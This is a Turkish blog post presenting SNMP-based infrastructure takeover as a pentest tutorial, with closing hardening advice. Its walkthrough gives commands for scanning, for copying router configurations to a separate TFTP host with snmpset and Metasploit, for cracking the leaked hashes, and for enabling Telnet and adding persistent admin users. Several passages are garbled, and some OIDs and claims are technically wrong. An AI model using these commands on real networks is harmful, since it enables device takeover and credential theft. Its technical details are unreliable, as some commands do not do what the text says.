CyberFlow Logo CyberFlow BLOG
Snmp Pentest

SNMP Üzerinden Altyapı Ele Geçirme: Temel Stratejiler ve Yöntemler

✍️ Ahmet BİRKAN 📂 Snmp Pentest

Bu blog, SNMP üzerinden altyapı ele geçirme tekniklerini kapsamlı bir şekilde açıklamaktadır. Siber güvenlik alanında önemli bilgiler sunmaktadır.

SNMP Üzerinden Altyapı Ele Geçirme: Temel Stratejiler ve Yöntemler

SNMP, siber güvenlikte kritik bir zafiyet alanıdır. Altyapı ele geçirme sürecinde yapılan adımları ve teknikleri detaylarıyla inceleyin. Eğitim verileri ile pratik ipuçları.

Giriş ve Konumlandırma

SNMP ve Altyapı Ele Geçirme

Siber güvenlik alanında, yönetim ve denetim süreçlerinin etkinliği, ağ altyapısının güvenliği açısından kritik bir rol oynamaktadır. Bu bağlamda, Simple Network Management Protocol (SNMP) üzerinden altyapı ele geçirme saldırıları, popüler ve etkili yöntemler arasında sayılmaktadır. SNMP, cihazların ağ üzerinde izlenmesi ve yönetilmesi amacıyla kullanılan bir protokoldür. Ancak, yanlış yapılandırmalar ve zayıf kimlik doğrulama mekanizmaları, bu protokolü kötü niyetli saldırganlar için fırsata dönüştürmektedir.

Önemi ve Riskleri

SNMP’nin basitliği, birçok ağ yöneticisi için avantaj sağlasa da, aynı zamanda ciddi riskleri de beraberinde getirmektedir. Özellikle, RW (Read-Write) yetkileri, saldırganların cihaz ayarlarına müdahale edebilmesine imkân tanır. Bu yetkilerle, ağ yapısının kontrolünü ele geçirmek mümkün olur. Ele geçirilen bir cihaz aracılığıyla, saldırganların diğer kritik cihazlara sızması, ağın omurgasını etkileyen büyük çaplı bir saldırıya dönüşebilir. Böyle bir durum, yalnızca veri sızıntısına sebep olmakla kalmaz, aynı zamanda ağ hizmetlerinin kesintiye uğramasına da yol açabilir.

Altyapı ele geçirme, bir ağın omurgasını oluşturan kritik cihazların (örn. yönlendiriciler, anahtarlar, güvenlik duvarları) yönetimsel kontrolünün tamamen ele geçirilmesidir.

Siber Güvenlik, Pentest ve Savunma Bağlamı

Siber güvenlik uzmanlarının en önemli görevlerinden birisi, potansiyel zayıflıkları belirleyerek bunlara karşı önlemler almaktır. Altyapı ele geçirme, sızma testleri (pentest) sırasında kullanılabilecek bir teknik olarak öne çıkmaktadır. Bu tür testler, bir ağın güvenlik açıklarının tespit edilmesini ve giderilmesini sağlar.

Pentest yaparken, saldırganların izlediği adımların simülasyonu önem arz eder. Örneğin, ilk adımda, SNMP servislerini ve versiyonlarını haritalandırmak için geniş ağ keşfi yapılması gerekmektedir. Uygulama sırasında, saldırganlar genellikle UDP 161 numaralı port üzerinden tarama yaparak bu verilere ulaşır:

nmap -sU -p 161 -sV 192.168.1.0/24

Bu süreç, ağın hangi cihazların yönetim protokollerini kullandığını hem belirler hem de yazma yetkisi olan topluluk dizgilerini ele geçirmek için fırsatlar sunar. RW yetkisi sahip olunan bir cihazdan alınan 'running-config' dosyası, cihazın tüm şifrelerini ve ayarlarını içerir. Böylelikle, sistemdeki kritik değişikliklerin yapılabilmesi için gerekli bilgiler elde edilir.

Teknik İçeriğe Hazırlık

Bu bağlamda ele alınan "infraelektrik" olayları, siber tehditlere karşı koyma bağlamında kritik bir önem taşımaktadır. SNMP üzerinden altyapı ele geçirme, sistem yöneticilerini, özellikle de ağ path'lerini nasıl koruyabilecekleri konusunda eğitmektedir. Okuyucuların, siber saldırı yöntemleri ve bunların etkilerini anlama becerilerini geliştirmeye yönelik bir temel oluşturmaktadır.

Altyapıyı ele geçirme saldırıları genellikle dış saldırganlar tarafından gerçekleştirilmiş olsa da, içeriden gelen tehditler de göz ardı edilmemelidir. Bu durum, yalnızca bir ağın güvenlik katmanlarını değil, aynı zamanda yönetim politikalarını da gözden geçirmeyi gerektirmektedir. Salgında kalıcılığı sağlamak, bütünsel bir siber güvenlik stratejisinin önemli bir parçasıdır.

Sonuç olarak, SNMP üzerinden altyapı ele geçirme, siber güvenlik alanında dikkat edilmesi gereken önemli bir konudur. Okuyucuların bu teknikleri anlaması, aynı zamanda uygulama aşamasında karşılaşabilecekleri zorluklar hakkında daha bilinçli hale gelmelerini sağlayacaktır. Bu süreç, siber güvenlikte sağlam bir zemin oluşturarak, potansiyel tehlikeleri ortadan kaldırma yolunda bir adım daha ileri gitmenin yolunu açar.

Teknik Analiz ve Uygulama

Geniş Ağ Keşfi ve UDP 161 Taraması

Altyapıyı ele geçirmek amacıyla ilk adım, ağ üzerinde SNMP (Simple Network Management Protocol) servislerini tanımlamaktır. Bu süreçte kullanılan en yaygın araçlardan biri nmap’dır. Aşağıdaki komut, bir C Class ağı içerisindeki SNMP servislerini ve versiyonlarını taramak için kullanılabilir:

nmap -sU -p 161 -sV 192.168.1.0/24

Bu komut, ağda çalışan SNMP servislerini belirlerken, hangi versiyonların kullanıldığını da gösterir. SNMP, genellikle UDP 161 portu üzerinden çalıştığı için -sU ile UDP taraması yapılır. -sV ise servis versiyonunu belirler. Bu bilgiler, olası bir sızma girişimi için gereklidir.

RW Yetkisi ve Altyapı Etkisi

Ele geçirme operasyonunun başarısı, SNMP üzerinden yazma (RW) yetkisine yapacağınız erişime bağlıdır. RW yetkisine sahip topluluk dizgileri ile altyapı cihazlarının yönetimi tamamen ele geçirilebilir. Altyapıda kritik cihazlar (router, switch, firewall vb.) üzerinde tam kontrol sağlandığında, cihazın tüm ayarları ve politikaları üzerinde değişiklik yapma imkanı doğar.

Altyapıdaki SNMP topluluk dizgilerini sızdırmanın anahtarı, yetkili dizgilerin ele geçirilmesidir. Eğer RW yetkisine sahipseniz, aşağıdaki şekilde bir running-config dosyasını TFTP üzerinden dışarı alabilirsiniz:

snmpset -v 2c -c RW_Community_String 192.168.1.1 .1.3.6.1.4.1.9.2.1.55.0 s "tftp://192.168.1.2/backup_config"

Tanım: Infrastructure Takeover

Altyapı ele geçirme işlemleri, bir ağda kritik cihazların tamamen kontrol altına alınmasıdır. Bu işlem, yalnızca SNMP üzerinden değil, aynı zamanda diğer yönetim protokollerinin zayıflıklarından da kaynaklanabilir. Ele geçirilen cihazlar, saldırganın ağın diğer bölümlerine sıçramak için kullanabilecekleri giriş noktaları yaratır.

Konfigürasyon Dosyasını Sızdırma (Exfiltration)

Sızdırılan konfigürasyon dosyası, ağın diğer bölümlerine erişimin anahtarını sağlar. Örneğin, ele geçirilen bir cihazın konfigürasyon dosyasındaki hash değerleri, diğer cihazlara giriş yapmak için kullanılacak şifrelerin belirlenmesine yardımcı olur.

RC4 gibi zayıf şifreleme yöntemleri veya Cisco Type 7 şifreleme gibi basit şifreler bu işlem için elverişlidir. Aşağıdaki örnekte, Metasploit kullanarak bir Cisco cihazından konfigürasyon çekilebilir:

use auxiliary/scanner/snmp/cisco_config_copy
set RHOSTS 192.168.1.1
set COMMUNITY "RW_Community_String"
run

Post-Exfiltration: Hash Cracking

Sızdırılan konfigürasyon dosyası elinizdeyken, içerdiği hashlerin kırılması gerekecektir. Bu, farklı algoritmalara göre değişiklik gösterir:

  • Cisco Type 5 (MD5): Orta seviye zorluk, sağlam bir sözlük ve GPU gücü gerektirir.
  • Cisco Type 7: Zayıf şifreleme, hızla düz metne dönüştürülebilir.
  • Cisco Type 8/9 (SHA-256): Kırması en zor, zaman alıcı süreç.

Bu hashlerin kırılması, SNMP üzerinden elde ettiğiniz bilgilere dayanarak, altyapının diğer cihazlarına erişim sağlamak için kritik bir adımdır.

Teknik Terim: Pivoting

Ele geçirilen bir Axios cihazını, ağın daha derinlerine veya izole edilmiş segmentlerine (VLAN) sızmak için sıçrama noktası olarak kullanmak, "pivoting" olarak adlandırılır. Sıçrama işlemi, saldırganın ağın farklı bölümlerine geçiş yapmasına olanak tanır.

Örnek olarak, aşağıdaki komutlar bir cihazın port ayarlarını değiştirerek tüm VLAN trafiğini dinlemeye (sniffing) olanak tanıyabilir:

snmpset -v 2c -c RW_Community_String 192.168.1.1 .1.3.6.1.2.1.2.2.1.7.1 i 1

Uzaktan Yönetim Servislerini Etkinleştirme

RW yetkisi ile kapalı olan Telnet veya SSH servislerini açmak mümkündür. Aşağıdaki komut, SNMP OID manipülasyonu ile bu servislerin aktif hale getirilmesi için kullanılabilir:

snmpset -v 2c -c RW_Community_String 192.168.1.1 .1.3.6.1.4.1.9.9.42.1.1.1.0 i 1

Bu işlem, XSS (cross-site scripting) ile aynı mantıkta, hedef sisteme yerleştirilmiş bir backdoor’u amaçlayan bir yöntemdir.

Nihai Hedef: Full Compromise

Tüm bu adımların amacı, nihai olarak sistemin tamamen ele geçirilmesidir (Full Compromise). Bu noktaya geldiğinizde, SNMP trafiğinin detayları da dahil olmak üzere, yöneticilerin yaptığı değişiklikler üzerinde kontrol sahibi olursunuz. Altyapıyı ele geçirdikten sonra, kurulabileceğiniz birçok kalıcılık çözümü vardır. Bu hedefin başarılı bir şekilde gerçekleştirilmesi, siber güvenlik stratejileri ve yeterli bilgilere sahip olmayı gerektirir.

Risk, Yorumlama ve Savunma

Siber güvenlik alanında, özellikle SNMP (Simple Network Management Protocol) kullanarak altyapı ele geçirme saldırılarında risk değerlendirmesi ve savunma stratejileri kritiktir. Bu bölümde, elde edilen bulguların güvenlik anlamı, yanlış yapılandırmaların etkileri, sızan verilerin analizi ve savunma için önerilen önlemler üzerinde durulacaktır.

Elde Edilen Bulgular ve Güvenlik Anlamı

SNMP, ağ yöneticilerine cihazların yönetiminde ve izlenmesinde büyük kolaylık sağlar. Ancak, yanlış yapılandırılmış veya gereksiz yere açık tutulan SNMP arayüzleri, saldırganlar için bir kapı açar. Örneğin, aşağıdaki gibi bir nmap komutu kullanılarak ağdaki SNMP servisleri taranabilir:

nmap -sU -p 161 -sV 192.168.1.0/24

Bu tarama sonucunda, bir ağ bloğundaki SNMP servislerinin versiyonları ve erişim düzeyleri belirlenebilir. Eğer SNMP aygıtlarının Read-Write (RW) yetkisi varsa, bir saldırgan bu yetkileri kullanarak kritik konfigürasyon dosyalarına erişebilir.

Yanlış Yapılandırma ve Zafiyetler

Elde edilen bulgular sonucunda, eğer RW yetkili topluluk dizgileri ifşa edilirse, altyapının tamamen ele geçirilmesi mümkün hale gelir. Örneğin, cihazların konfigürasyon dosyalarını TFTP üzerinden dışarı almak, ağdaki güvenliği tehdit eder. Aşağıda, sızdırılan bir konfigürasyon dosyası aracılığıyla yapılan bir örnek senaryo verilmektedir:

tftp 192.168.1.2
get running-config

Bu işlem, kritik cihazların yapılandırmalarıyla birlikte, parola hash'lerini de açığa çıkarır. Örneğin, Cisco Type 7 hash'lerinin zayıf şifrelemeye sahip olduğu göz önünde bulundurulduğunda, bu tür hash'lerin birkaç saniye içinde düz metne (cleartext) dönüştürülebilmesi sorun teşkil eder. Bu doğrultuda, RW yetkisi ile ağ alt yapısına sızmak mümkün hale gelir.

Sızan Veri ve Topoloji Tespiti

Ele geçirilen network konfigürasyon dosyaları, saldırganlara ağ topolojisini ve dolayısıyla mevcut hizmetleri tespit etme fırsatı tanır. Saldırgan, bu bilgileri kullanarak hedefin zayıf noktalarını belirleyebilir ve ağda daha derinlemesine ilerlemek için "pivoting" (sıçrama) yapabilir.

Örneğin, bir saldırgan ele geçirilen bir Cisco cihazını kullanarak yeni bir "Privilege 15" kullanıcısı ekleyebilir ve konfigürasyonu mühürleyerek (write memory), erişimin kalıcı hale gelmesini sağlayabilir.

Profesyonel Önlemler ve Hardening Önerileri

Altyapıyı siber saldırılara karşı korumak için alınacak önlemler arasında şunlar bulunmaktadır:

  1. SNMPv3 Kullanımı: Protokol sürümü olarak, güçlü şifreleme ve kimlik doğrulama sağlaması açısından SNMPv3 tercih edilmelidir. Bu, v1 ve v2c protokollerinin kullanıcı hatalarına açık tasarımı göz önüne alındığında önemlidir.

  2. Yapılandırma Sınırlamaları: Cihazlarda Read-Only (RO) yetkiler mümkün olduğunca tercih edilmeli ve RW yetkileri yalnızca gerektiğinde, güvenli ortamlarda kullanılmalıdır.

  3. Ağ İzolasyonu: Yönetim trafiği için ayrı bir tesisat (Out-of-Band, OOB) ağı kurulmalıdır. Bu da yönetim düzleminin daha az erişilebilir olmasını sağlar.

  4. Düzenli Güvenlik Taramaları: Ağ düzenli olarak güvenlik taramalarına tabi tutulmalı ve zayıf noktalar tespit edilerek gerekli düzeltmeler yapılmalıdır.

  5. Kontrol Düzlemi Güvenliği: Cihazın işlemcisini aşırı SNMP sorgularına ve DoS saldırılarına karşı korumak için kontrol düzlemi politikasının uygulanması önemlidir.

Sonuç

SNMP üzerinden altyapı ele geçirme saldırılarında, yanlış yapılandırmalar büyük bir güvenlik riski oluşturur. RW yetkileri düzeyinde yapılan hatalar, ağın tamamının ihlal edilmesine yol açabilir. Ağ güvenliğini artırmak adına profesyonel savunma yöntemleri ve sıkı yapılandırmalar uygulamak, bu tür saldırılara karşı elde edilecek en etkili stratejilerdir. Altyapıyı yönetme ve koruma becerileri, siberyetkililerin bu tür tehditlere karşı hazırlıklı olmalarını sağlayacaktır.